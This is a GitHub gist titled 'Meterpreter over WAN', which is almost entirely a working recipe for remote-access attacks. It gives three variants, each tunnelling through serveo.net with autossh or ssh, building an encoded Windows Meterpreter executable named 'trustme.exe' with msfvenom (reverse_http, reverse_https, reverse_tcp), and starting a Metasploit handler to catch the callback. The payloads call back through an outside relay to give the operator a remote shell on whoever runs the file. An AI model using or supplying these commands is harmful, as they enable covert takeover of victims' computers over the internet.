Skip to content

Instantly share code, notes, and snippets.

@veekram
Forked from pawiromitchel/reverse_http_80.md
Created May 4, 2020 03:17
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save veekram/e5725180c74ddfe1b653d35826d5b2ea to your computer and use it in GitHub Desktop.
Save veekram/e5725180c74ddfe1b653d35826d5b2ea to your computer and use it in GitHub Desktop.
Meterpreter over WAN

Start the tunnel

Used autossh for persistant ssh session (reconnects when it breaks)

autossh -R trustme:80:localhost:80 serveo.net

Generate the payload

msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_http LHOST=trustme.serveo.net LPORT=80 --bad-chars “\x00” --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe

Listen for incoming connections

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LHOST 0.0.0.0;set LPORT 80;run;"

Start the tunnel

Used autossh for persistant ssh session (reconnects when it breaks)

autossh -R trustme:443:localhost:443 serveo.net

Generate the payload

msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_https LHOST=trustme.serveo.net LPORT=443 --bad-chars “\x00” --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe

Listen for incoming connections

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST 0.0.0.0;set LPORT 443;run;"

Start the tunnel

ssh -R 1492:localhost:1492 serveo.net

Generate the payload

msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=serveo.net LPORT=1492 --bad-chars “\x00” --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe

Listen for incoming connections

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set LPORT 1492;run;"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment